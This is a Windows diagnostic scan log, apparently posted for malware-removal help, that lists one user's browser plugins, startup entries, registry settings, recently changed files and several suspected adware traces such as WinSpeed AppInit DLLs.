CHR - plugin: Google Talk Plugin Video Accelerator (Enabled) = C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npgtpo3dautoplugin.dll
CHR - plugin: Google Talk Plugin Video Renderer (Enabled) = C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npo1d.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
CHR - plugin: Google Earth Plugin (Enabled) = C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll
CHR - plugin: Java™ Platform SE 7 U7 (Enabled) = C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
CHR - plugin: McAfee SiteAdvisor (Enabled) = C:\Program Files (x86)\McAfee\SiteAdvisor\npmcffplg32.dll
CHR - plugin: McAfee Virtual Technician (Enabled) = C:\Program Files (x86)\McAfee\Supportability\MVT\npmvtplugin.dll
CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll
CHR - plugin: Uplay PC (Enabled) = C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll
CHR - plugin: Windows Live\u00C3\u0083\u00C2\u0082\u00C3\u0082\u00C2\u0099 Photo Gallery (Enabled) = C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
CHR - plugin: Unity Player (Enabled) = C:\Users\Bri\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
CHR - plugin: Facebook Desktop (Enabled) = C:\Users\Bri\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll
CHR - plugin: Facebook Video Calling Plugin (Enabled) = C:\Users\Bri\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_224.dll
CHR - plugin: Java Deployment Toolkit 7.0.70.11 (Enabled) = C:\windows\SysWOW64\npDeployJava1.dll
CHR - plugin: Shockwave for Director (Enabled) = C:\windows\system32\Adobe\Director\np32dsw.dll
CHR - plugin: McAfee SecurityCenter (Enabled) = c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL
CHR - Extension: Turn Off the Lights = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfbmjmiodbnnpllbbbfblcplfjjepjdn\2.3.0.5_1\
CHR - Extension: JAM with Chrome = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\bggjdpbfjakfkacljidachigalghbnpk\0.2_1\
CHR - Extension: Google Cast = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd\13.1210.0.6_0\
CHR - Extension: Send to Kindle for Google Chrome\u2122 = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgdjpilhipecahhcilnafpblkieebhea\1.0.1.56_0\
CHR - Extension: SiteAdvisor = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho\3.6.4.1291_0\
CHR - Extension: AdBlock = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom\2.6.16_1\
CHR - Extension: PlaceIt: Your Screenshot in Your Favorite Device = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\hijaedcdaljajmngmmippghbajaadmfb\0.5.4_1\
CHR - Extension: Plypp Piano = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\hofckkgpnnjabffkjemconojemcibifh\6.1_1\
CHR - Extension: Clipular! Research, save & share screenshot = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmjbgcjbgmcfgbgikmbdioggjlhjegpp\10.8.29.2046_1\
CHR - Extension: Little Alchemy = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\knkapnclbofjjgicpkfoagdjohlfjhpd\0.0.15.7_1\
CHR - Extension: Until AM Web App = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\kodigjkcpaoeodlnmcnekemakpnmegnk\0.204_1\
CHR - Extension: AudioSauna = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkgfemnodkdnenmfkblebnkjpckkjcae\0.404_1\
CHR - Extension: ButtonBeats Guitar = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkcpeekapbmklcidenkpbjcpcicmjmnf\5_1\
CHR - Extension: TumTaster = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanfbkacbckngfcklahdgfagjlghfbgm\0.5.1_0\
CHR - Extension: Google Wallet = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.0_0\
CHR - Extension: My Chrome Theme = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic\2.0_1\
 
O1 HOSTS File: ([2012/06/23 16:42:24 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - No CLSID value found.
O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:64bit: - HKLM..\Run: [cAudioFilterAgent] C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent64.exe (Conexant Systems, Inc.)
O4:64bit: - HKLM..\Run: [Energy Management] C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe (Lenovo (Beijing) Limited)
O4:64bit: - HKLM..\Run: [EnergyUtility] C:\Program Files (x86)\Lenovo\Energy Management\utility.exe (Lenovo(beijing) Limited)
O4:64bit: - HKLM..\Run: [ETDWare] C:\Program Files\Elantech\ETDCtrl.exe (ELAN Microelectronics Corp.)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [Logitech Download Assistant] C:\windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:64bit: - HKLM..\Run: [OnekeyStudio] C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe (Lenovo)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [AdobeCS5ServiceManager] C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)
O4 - HKLM..\Run: [mcpltui_exe] C:\Program Files\McAfee.com\Agent\mcagent.exe (McAfee, Inc.)
O4 - HKLM..\Run: [mcui_exe] C:\Program Files\McAfee.com\Agent\mcagent.exe (McAfee, Inc.)
O4 - HKLM..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [UCam_Menu] C:\Program Files (x86)\Lenovo\YouCam\MUITransfer\MUIStartMenu.exe (CyberLink Corp.)
O4 - HKLM..\Run: [UpdateP2GShortCut] C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe (CyberLink Corp.)
O4 - HKLM..\Run: [VeriFaceManager] C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe (Lenovo)
O4 - HKCU..\Run: [Amazon Cloud Player] C:\Users\Bri\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe ()
O4 - HKCU..\Run: [DelayShred] c:\Program Files\McAfee\MQS\ShrCL.exe ()
O4 - HKCU..\Run: [Desura] C:\Program Files (x86)\Desura\desura.exe -autostart File not found
O4 - HKCU..\Run: [Facebook Update] C:\Users\Bri\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
O4 - HKCU..\Run: [Steam] C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation)
O4 - Startup: C:\Users\Bri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\Bri\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O4 - Startup: C:\Users\Bri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Messenger.lnk =  File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoControlPanel = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: LogonHoursAction = 2
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DontDisplayLogonHoursWarnings = 1
O8:64bit: - Extra context menu item: Free YouTube to iPod Converter - C:\Users\Bri\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetoipodconverter.htm File not found
O8 - Extra context menu item: Free YouTube to iPod Converter - C:\Users\Bri\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetoipodconverter.htm File not found
O9:64bit: - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O9:64bit: - Extra Button: Free YouTube Download - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - Reg Error: Key error. File not found
O9:64bit: - Extra 'Tools' menuitem : Free YouTube Download - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - Reg Error: Key error. File not found
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O9 - Extra Button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Users\Bri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU\Run IMVU.lnk ()
O9 - Extra Button: Free YouTube Download - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - Reg Error: Key error. File not found
O9 - Extra 'Tools' menuitem : Free YouTube Download - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - Reg Error: Key error. File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O15 - HKCU\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: freerealms.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: soe.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: sony.com ([]* in Trusted sites)
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab (OnlineScanner Control)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3349D9E5-FFC7-4C92-98BE-38877D14177D}: DhcpNameServer = 192.168.1.1
O18:64bit: - Protocol\Handler\dssrequest {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.)
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\sacore {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.)
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit: - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O18:[b]64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\dssrequest {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
O18 - Protocol\Handler\gopher - No CLSID value found
O18 - Protocol\Handler\sacore {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O18:[b]64bit: - Protocol\Filter\application/x-mfe-ipt {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll (McAfee, Inc.)
O18 - Protocol\Filter\application/x-mfe-ipt {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
O20:[b]64bit: - AppInit_DLLs: (C:\PROGRA~3\WinSpeed\WINSPE~1.DLL) - C:\ProgramData\WinSpeed\WinSpeed_x64.dll ()
O20 - AppInit_DLLs: (c:\progra~3\winspeed\winspeed.dll) - c:\ProgramData\WinSpeed\WinSpeed.dll ()
O20:[b]64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit: - HKLM Winlogon: UserInit - (C:\windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20:[b]64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\windows\SysNative\igfxdev.dll (Intel Corporation)
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit: - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O35 - HKCU\..exefile [open] -- "%1" %*
O37:[b]64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/01/05 13:28:16 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Bri\Desktop\OTL.exe
[2014/01/04 18:06:46 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\kerfjk_data
[2014/01/03 22:47:35 | 000,000,000 | ---D | C] -- C:\ProgramData\regid.1986-12.com.adobe
[2014/01/03 22:47:01 | 000,000,000 | ---D | C] -- C:\Program Files\Adobe
[2014/01/03 22:45:17 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Adobe
[2014/01/03 22:15:01 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\Adobe CS5
[2014/01/02 01:38:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ShoPDroop
[2014/01/02 01:38:16 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\DiggiCoauPOnu
[2014/01/01 21:03:15 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\holla
[2014/01/01 14:20:16 | 000,000,000 | ---D | C] -- C:\Users\Bri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromecast
[2013/12/30 02:25:11 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\all of teh world_data
[2013/12/30 02:24:05 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\stupor_data
[2013/12/29 20:40:12 | 000,000,000 | ---D | C] -- C:\ProgramData\ShoPDroop
[2013/12/29 20:40:11 | 000,000,000 | ---D | C] -- C:\ProgramData\ehbflkekalelehfndkkdnopooeaopkmk
[2013/12/29 20:40:08 | 000,000,000 | ---D | C] -- C:\Users\Bri\AppData\Local\Packages
[2013/12/29 20:40:01 | 000,000,000 | ---D | C] -- C:\ProgramData\3e010479f616da2d
[2013/12/29 20:39:58 | 000,000,000 | ---D | C] -- C:\ProgramData\DiggiCoauPOnu
[2013/12/28 23:20:54 | 000,000,000 | ---D | C] -- C:\ProgramData\WinSpeed
[2013/12/28 12:27:19 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\Mmph
[2013/12/26 18:00:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ableton
[2013/12/26 18:00:58 | 000,368,640 | ---- | C] (Propellerhead Software AB) -- C:\windows\SysWow64\ReWire.dll
[2013/12/26 18:00:58 | 000,233,472 | ---- | C] (Propellerhead Software AB) -- C:\windows\SysWow64\REX Shared Library.dll
[2013/12/26 17:59:09 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Ableton
[2013/12/25 20:17:59 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\Audacity files
[2013/12/15 13:44:16 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\Nordic Laurel
[2013/12/15 13:43:45 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth
[2013/12/12 20:44:41 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\Apologetic
[2013/12/06 22:18:21 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\Summer stuff
[2013/12/06 22:11:44 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\mmmsdjndf
[2013/12/06 22:09:26 | 000,000,000 | ---D | C] -- C:\Users\Bri\Desktop\Spring Break photos
[2 C:\windows\SysWow64\*.tmp files -> C:\windows\SysWow64\*.tmp -> ]
[1 C:\Users\Bri\Documents\*.tmp files -> C:\Users\Bri\Documents\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/01/05 13:36:01 | 000,000,898 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA1ced214b7bd6cb.job
[2014/01/05 13:28:20 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Bri\Desktop\OTL.exe
[2014/01/05 13:22:00 | 000,000,830 | ---- | M] () -- C:\windows\tasks\Adobe Flash Player Updater.job
[2014/01/04 22:36:00 | 000,000,888 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/01/04 21:07:33 | 000,727,334 | ---- | M] () -- C:\windows\SysNative\PerfStringBackup.INI
[2014/01/04 21:07:33 | 000,624,864 | ---- | M] () -- C:\windows\SysNative\perfh009.dat
[2014/01/04 21:07:33 | 000,106,950 | ---- | M] () -- C:\windows\SysNative\perfc009.dat
[2014/01/04 18:13:53 | 018,869,912 | ---- | M] () -- C:\Users\Bri\Desktop\stupor.wav
[2014/01/04 18:13:23 | 000,028,168 | ---- | M] () -- C:\Users\Bri\Desktop\stupor.aup
[2014/01/04 18:06:49 | 000,026,869 | ---- | M] () -- C:\Users\Bri\Desktop\kerfjk.aup
[2014/01/04 16:34:40 | 000,013,632 | -H-- | M] () -- C:\windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/01/04 16:34:40 | 000,013,632 | -H-- | M] () -- C:\windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/01/04 14:39:10 | 000,004,518 | ---- | M] () -- C:\Users\Bri\Desktop\attach.zip
[2014/01/04 12:09:28 | 000,000,358 | -H-- | M] () -- C:\windows\tasks\ZoomExUpdaterTask{78672D06-AEC8-4414-893A-D37662B3360A}.job
[2014/01/04 12:09:03 | 000,067,584 | --S- | M] () -- C:\windows\bootstat.dat
[2014/01/04 12:09:02 | 005,121,160 | ---- | M] () -- C:\windows\SysNative\FNTCACHE.DAT
[2014/01/04 12:08:29 | 3063,033,856 | -HS- | M] () -- C:\hiberfil.sys
[2014/01/01 14:20:17 | 000,001,199 | ---- | M] () -- C:\Users\Bri\Desktop\Chromecast.lnk
[2013/12/30 23:21:41 | 001,384,754 | ---- | M] () -- C:\Users\Bri\Desktop\johlock.ptg
[2013/12/30 23:06:47 | 000,108,976 | ---- | M] () -- C:\Users\Bri\Desktop\johlock.jpg
[2013/12/30 22:49:28 | 002,170,843 | ---- | M] () -- C:\Users\Bri\Desktop\zdv.ptg
[2013/12/30 02:25:11 | 000,007,931 | ---- | M] () -- C:\Users\Bri\Desktop\all of teh world.aup
[2013/12/27 21:50:47 | 000,198,074 | ---- | M] () -- C:\Users\Bri\Desktop\tumblr_mt88rbK1hY1s20ivko1_r1_500.gif
[2013/12/26 20:21:13 | 000,000,867 | ---- | M] () -- C:\Users\Bri\Desktop\Ableton Live 9 Lite.lnk
[2013/12/23 22:13:32 | 000,002,355 | ---- | M] () -- C:\Users\Bri\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/12/23 20:38:20 | 000,001,197 | ---- | M] () -- C:\Users\Bri\Desktop\Amazon Cloud Player.lnk
[2013/12/22 20:41:46 | 000,000,848 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskUserS-1-5-21-3901552383-3588588893-1284758976-1000Core1ceff99491878c4.job
[2013/12/21 00:21:23 | 000,001,042 | ---- | M] () -- C:\Users\Bri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2013/12/21 00:21:10 | 000,001,006 | ---- | M] () -- C:\Users\Bri\Desktop\Dropbox.lnk
[2 C:\windows\SysWow64\*.tmp files -> C:\windows\SysWow64\*.tmp -> ]
[1 C:\Users\Bri\Documents\*.tmp files -> C:\Users\Bri\Documents\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/01/04 18:13:51 | 018,869,912 | ---- | C] () -- C:\Users\Bri\Desktop\stupor.wav
[2014/01/04 18:06:49 | 000,026,869 | ---- | C] () -- C:\Users\Bri\Desktop\kerfjk.aup
[2014/01/04 14:39:10 | 000,004,518 | ---- | C] () -- C:\Users\Bri\Desktop\attach.zip
[2014/01/03 22:47:11 | 000,001,075 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS5 (64 Bit).lnk
[2014/01/03 22:45:13 | 000,001,133 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS5.lnk
[2014/01/03 22:44:43 | 000,001,226 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Device Central CS5.lnk
[2014/01/03 22:42:45 | 000,001,317 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Extension Manager CS5.lnk
[2014/01/03 22:42:34 | 000,001,483 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe ExtendScript Toolkit CS5.lnk
[2014/01/01 14:20:17 | 000,001,199 | ---- | C] () -- C:\Users\Bri\Desktop\Chromecast.lnk
[2013/12/30 23:06:47 | 000,108,976 | ---- | C] () -- C:\Users\Bri\Desktop\johlock.jpg
[2013/12/30 23:05:38 | 001,384,754 | ---- | C] () -- C:\Users\Bri\Desktop\johlock.ptg
[2013/12/30 22:49:26 | 002,170,843 | ---- | C] () -- C:\Users\Bri\Desktop\zdv.ptg
[2013/12/30 02:25:11 | 000,007,931 | ---- | C] () -- C:\Users\Bri\Desktop\all of teh world.aup
[2013/12/30 02:24:08 | 000,028,168 | ---- | C] () -- C:\Users\Bri\Desktop\stupor.aup
[2013/12/27 21:50:44 | 000,198,074 | ---- | C] () -- C:\Users\Bri\Desktop\tumblr_mt88rbK1hY1s20ivko1_r1_500.gif
[2013/12/26 20:21:13 | 000,000,867 | ---- | C] () -- C:\Users\Bri\Desktop\Ableton Live 9 Lite.lnk
[2013/12/26 18:55:54 | 701,116,416 | ---- | C] () -- C:\Users\Bri\Desktop\Setup.msi
[2013/12/22 20:41:46 | 000,000,848 | ---- | C] () -- C:\windows\tasks\GoogleUpdateTaskUserS-1-5-21-3901552383-3588588893-1284758976-1000Core1ceff99491878c4.job
[2013/02/11 20:22:32 | 000,000,604 | -H-- | C] () -- C:\Program Files (x86)\_F2a
[2012/07/23 11:05:05 | 000,003,584 | ---- | C] () -- C:\Users\Bri\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/07/12 15:09:06 | 000,189,248 | ---- | C] () -- C:\windows\SysWow64\PnkBstrB.exe
[2012/07/12 15:08:52 | 000,075,136 | ---- | C] () -- C:\windows\SysWow64\PnkBstrA.exe
[2012/02/14 23:34:00 | 000,000,017 | ---- | C] () -- C:\windows\SysWow64\shortcut_ex.dat
[2011/11/26 14:07:34 | 000,000,112 | ---- | C] () -- C:\ProgramData\45XpHA1.dat
[2011/07/18 16:23:52 | 000,000,632 | RHS- | C] () -- C:\Users\Bri\ntuser.pol
[2011/04/25 22:03:49 | 000,000,192 | ---- | C] () -- C:\ProgramData\BestAntivirus2011(2)
[2010/12/23 12:40:48 | 000,000,056 | -H-- | C] () -- C:\ProgramData\ezsidmv.dat
[2010/08/03 07:38:58 | 000,000,235 | ---- | C] () -- C:\ProgramData\Microsoft.SqlServer.Compact.351.32.bc
 
========== ZeroAccess Check ==========
 
[2009/07/13 20:55:00 | 000,000,227 | RHS- | M] () -- C:\windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2012/06/08 21:30:56 | 014,165,504 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012/06/08 20:46:56 | 012,868,608 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 17:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/07/13 17:15:20 | 000,605,696 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 17:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
